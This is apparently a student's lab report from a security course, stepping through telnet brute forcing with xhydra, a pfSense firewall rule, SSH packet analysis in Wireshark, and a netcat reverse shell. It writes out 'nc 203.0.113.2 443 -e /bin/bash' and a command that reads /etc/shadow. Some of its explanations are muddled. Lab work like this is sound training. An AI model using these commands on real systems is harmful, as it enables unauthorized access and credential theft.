Stephen Dick

CVF1083

1/30/18

Lab 3

Task 1: connect linux using telnet

1.
Went to the top left, clicked on the blue onion icon>security onion>wireshark at the bottom and opened
it.

2.

Navigated to capture> then opened interfaces and clicked start on eth 0.

Wireshark has started to scan for packets.

3. (Kali linux version here)

Navigated to the top bar and opened the terminal. Ran the command ifconfig to see the addresses
associated.
4.

Ran the command nmap -p 23 192.168.1.0/24 to scan port 23 for any open subnets within the port.

5.

Used the telnet command and couldn’t get a connection between the machines.

6.
Used xhydra command in the kali terminal and changed the ip to 192.168.1.50 and the protocol to
telnet.

7.
Typed xhydra in the terminal in kali, and changed the useraname to student

Then selected the password list filling it with /tmp/wordlists/passlist.

8.

Started the password cracking, and this showed up, unsure of what I have done wrong with the setup

Task 1.2 Analyzing telnet

1.
Telnetted the ip 192.168.1.50

Wasn’t presented, it was failed, unsure why.

Task 1.3 setting up pfsense

Logged into pfsense in the security onion

2.

Selected the firewall>rules and selected add more.

3.
Set action > Reject

Set interface > external GW

Protocol > TCP

Source type > external gw net

4.
Set the destination to internal gw net

Set the dest port range to and from telnet 23 and saved all the settings.

5.

After accepting the settings, I was shown a warning and I applied the changes.

6.

Was denied due to the firewall network

Ports were closed on the telnet

Task 2.1 analyzing ssh

1.

Typed ifconfig to check the ip status

2.
Started wireshark on the security onion for eth0 scan.

3.

Typed the command ssh student 192.168.1.50 and used securepassword as the password

4.
Went to the security onion and typed ssh in the filter, found out there was a key exchange over the
network.

5.

Checked packet 6 and looked at the tcp stream

6.
Key presented after checking the tcp stream

7.

Used the command netstat -tan | grep 22 to check the port status of 22

8.

Used the command pwd to check my current location in the directory.

9.
Used the command ls to check the list of files iin the directory.

10.

Used the command ls -a to check all files in the directory

11.

Used the command sudo su and used the password securepassword to gain access to the root of the
root machine.

12.
Used the command useradd admin1 to create the account admin1 on the ubuntu machine

13.

Used the command cat /etc/shadow | grep admin1 to check the ipv6 of admin1

14.

Used the command service proftpd status to check the tpd status of ubuntu, I then exited the ssh
connection

Section 3 connecting to a linux system by using netcat

3.1 using netcat to send a reverse shell

1.
Used the command nc -l –p 443 to listen to traffic over port 443(https)

2.

Used the command netstat -tan | grep 443 to check the status of port 443

3.

Used the command nc 203.0.113.2 443 -e /bin/bash to send shells to port 443 on linux

4.
Used the command uname -a as the 443 port was listening.

5.

Used the command ifconfig to check my network interfaces as the security onion

6.

Typed whoami in the terminal, and I am the security onion.

7.

There was no output I need priveliges.

8.

Used the command echo mypassword | sudo -S cat /etc/shadow to see the conetents of the folder

9.

Used the command netstat -tan | grep 443 to see the connections on port 443.